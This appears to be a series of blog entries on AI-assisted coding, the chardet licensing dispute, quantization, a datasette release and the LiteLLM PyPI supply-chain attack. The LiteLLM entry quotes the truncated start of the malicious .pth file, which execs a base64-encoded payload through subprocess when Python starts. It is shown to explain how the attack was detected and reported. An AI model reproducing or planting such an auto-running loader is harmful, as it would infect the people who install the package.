2026-03-28 05:11:17
FWIW, IANDBL, TINLA, etc., I don’t currently see any basis for concluding that chardet 7.0.0 is required to be released under the LGPL. AFAIK no one including Mark Pilgrim has identified persistence of copyrightable expressive material from earlier versions in 7.0.0 nor has anyone articulated some viable alternate theory of license violation. [...]
— Richard Fontana, LGPLv3 co-author, weighing in on the chardet relicensing situation
Tags: open-source, ai-ethics, llms, ai, generative-ai, ai-assisted-programming
2026-03-28 04:59:53
I have a new laptop - a 128GB M5 MacBook Pro, which early impressions show to be very capable for running good local LLMs. I got frustrated with Activity Monitor and decided to vibe code up some alternative tools for monitoring performance and I'm very happy with the results.
This is my second experiment with vibe coding macOS apps - the first was this presentation app a few weeks ago.
It turns out Claude Opus 4.6 and GPT-5.4 are both very competent at SwiftUI - and a full SwiftUI app can fit in a single text file, which means I can use them to spin something up without even opening Xcode.
I’ve built two apps so far: Bandwidther shows me what apps are using network bandwidth and Gpuer to show me what’s going on with the GPU. At Claude’s suggestion both of these are now menu bar icons that open a panel full of information.
I built this app first, because I wanted to see what Dropbox was doing. It looks like this:
I’ve shared the full transcript I used to build the first version of the app. My prompts were pretty minimal:
Show me how much network bandwidth is in use from this machine to the internet as opposed to local LAN
(My initial curiosity was to see if Dropbox was transferring files via the LAN from my old computer or was downloading from the internet.)
mkdir /tmp/bandwidther and write a native Swift UI app in there that shows me these details on a live ongoing basis
This got me the first version, which proved to me this was worth pursuing further.
git init and git commit what you have so far
Since I was about to start adding new features.
Now suggest features we could add to that app, the goal is to provide as much detail as possible concerning network usage including by different apps
The nice thing about having Claude suggest features is that it has a much better idea for what’s possible than I do.
We had a bit of back and forth fixing some bugs, then I sent a few more prompts to get to the two column layout shown above:
add Per-Process Bandwidth, relaunch the app once that is done
now add the reverse DNS feature but make sure original IP addresses are still visible too, albeit in smaller typeface
redesign the app so that it is wider, I want two columns - the per-process one on the left and the rest on the right
OK make it a task bar icon thing, when I click the icon I want the app to appear, the icon itself should be a neat minimal little thing
The source code and build instructions are available in simonw/bandwidther.
While I was building Bandwidther in one session I had another session running to build a similar tool for seeing what the GPU was doing. Here’s what I ended up with:
Here's the transcript. This one took even less prompting because I could use the in-progress Bandwidther as an example:
I want to know how much RAM and GPU this computer is using, which is hard because stuff on the GPU and RAM does not seem to show up in Activity Monitor
This collected information using system_profiler and memory_pressure and gave me an answer - more importantly it showed me this was possible, so I said:
Look at /tmp/bandwidther and then create a similar app in /tmp/gpuer which shows the information from above on an ongoing basis, or maybe does it better
After a few more changes to the Bandwidther app I told it to catch up:
Now take a look at recent changes in /tmp/bandwidther - that app now uses a sys tray icon, imitate that
This remains one of my favorite tricks for using coding agents: having them recombine elements from other projects.
The code for Gpuer can be found in simonw/gpuer on GitHub.
These two apps are classic vibe coding: I don't know Swift and I hardly glanced at the code they were writing.
More importantly though, I have very little experience with macOS internals such as the values these tools are measuring. I am completely unqualified to evaluate if the numbers and charts being spat out by these tools are credible or accurate!
I've added warnings to both GitHub repositories to that effect.
This morning I caught Gpuer reporting that I had just 5GB of memory left when that clearly wasn't the case (according to Activity Monitor). I pasted a screenshot into Claude Code and it adjusted the calculations and the new numbers look right, but I'm still not confident that it's reporting things correctly.
I only shared them on GitHub because I think they're interesting as an example of what Claude can do with SwiftUI.
Despite my lack of confidence in the apps themselves, I did learn some useful things from these projects:
These two apps took very little time to build and have convinced me that building macOS apps in SwiftUI is a new capability I should consider for future projects.
Tags: macos, ai, generative-ai, llms, vibe-coding, coding-agents, swift, claude-code
2026-03-27 08:35:01
We Rewrote JSONata with AI in a Day, Saved $500K/Year
Bit of a hyperbolic framing but this looks like another case study of vibe porting, this time spinning up a new custom Go implementation of the JSONata JSON expression language - similar in focus to jq, and heavily associated with the Node-RED platform.As with other vibe-porting projects the key enabling factor was JSONata's existing test suite, which helped build the first working Go version in 7 hours and $400 of token spend.
The Reco team then used a shadow deployment for a week to run the new and old versions in parallel to confirm the new implementation exactly matched the behavior of the old one.
Tags: go, json, ai, generative-ai, llms, agentic-engineering, vibe-porting
2026-03-27 07:58:22
My minute-by-minute response to the LiteLLM malware attack
Callum McMahon reported the LiteLLM malware attack to PyPI. Here he shares the Claude transcripts he used to help him confirm the vulnerability and decide what to do about it. Claude even suggested the PyPI security contact address after confirming the malicious code in a Docker container:Confirmed. Fresh download from PyPI right now in an isolated Docker container:
Inspecting: litellm-1.82.8-py3-none-any.whl FOUND: litellm_init.pth SIZE: 34628 bytes FIRST 200 CHARS: import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IHRlbXBmaWxl...The malicious
litellm==1.82.8is live on PyPI right now and anyone installing or upgrading litellm will be infected. This needs to be reported to [email protected] immediately.
I was chuffed to see Callum use my claude-code-transcripts tool to publish the transcript of the conversation.
Via Hacker News
Tags: pypi, security, ai, generative-ai, llms, claude, supply-chain
2026-03-27 00:21:09
Quantization from the ground up
Sam Rose continues his streak of publishing spectacularly informative interactive essays, this time explaining how quantization of Large Language Models works (which he says might be "the best post I've ever made".)Also included is the best visual explanation I've ever seen of how floating point numbers are represented using binary digits.

I hadn't heard about outlier values in quantization - rare float values that exist outside of the normal tiny-value distribution - but apparently they're very important:
Why do these outliers exist? [...] tl;dr: no one conclusively knows, but a small fraction of these outliers are very important to model quality. Removing even a single "super weight," as Apple calls them, can cause the model to output complete gibberish.
Given their importance, real-world quantization schemes sometimes do extra work to preserve these outliers. They might do this by not quantizing them at all, or by saving their location and value into a separate table, then removing them so that their block isn't destroyed.
Plus there's a section on How much does quantization affect model accuracy?. Sam explains the concepts of perplexity and ** KL divergence ** and then uses the llama.cpp perplexity tool and a run of the GPQA benchmark to show how different quantization levels affect Qwen 3.5 9B.
His conclusion:
It looks like 16-bit to 8-bit carries almost no quality penalty. 16-bit to 4-bit is more noticeable, but it's certainly not a quarter as good as the original. Closer to 90%, depending on how you want to measure it.
Tags: computer-science, ai, explorables, generative-ai, llms, sam-rose, qwen
2026-03-26 05:57:05
Release: datasette-files-s3 0.1a1
A backend for datasette-files that adds the ability to store and retrieve files using an S3 bucket. This release added a mechanism for fetching S3 configuration periodically from a URL, which means we can use time limited IAM credentials that are restricted to a prefix within a bucket.